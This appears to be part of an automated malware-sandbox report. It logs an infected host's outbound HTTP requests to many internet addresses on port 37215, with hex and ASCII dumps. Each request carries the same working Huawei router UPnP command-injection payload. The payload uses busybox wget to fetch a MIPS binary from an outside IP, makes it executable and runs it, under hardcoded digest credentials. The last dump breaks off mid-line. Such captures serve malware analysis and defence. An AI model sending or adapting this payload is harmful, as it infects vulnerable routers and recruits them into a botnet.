                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            943192.168.2.135148041.29.192.24837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.350665092 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            944192.168.2.1359056197.95.60.7037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.351687908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            945192.168.2.133728841.91.6.13437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.352658987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            946192.168.2.1336436156.16.82.23737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.354293108 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            947192.168.2.1346160156.210.121.20137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.355675936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            948192.168.2.134656441.68.125.22337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.356770992 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            949192.168.2.136003841.67.157.9137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.358062029 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            950192.168.2.1338604156.210.117.19737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.359723091 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            951192.168.2.1338238197.63.141.9837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.361006975 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            952192.168.2.1344006197.122.55.13937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.362468004 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 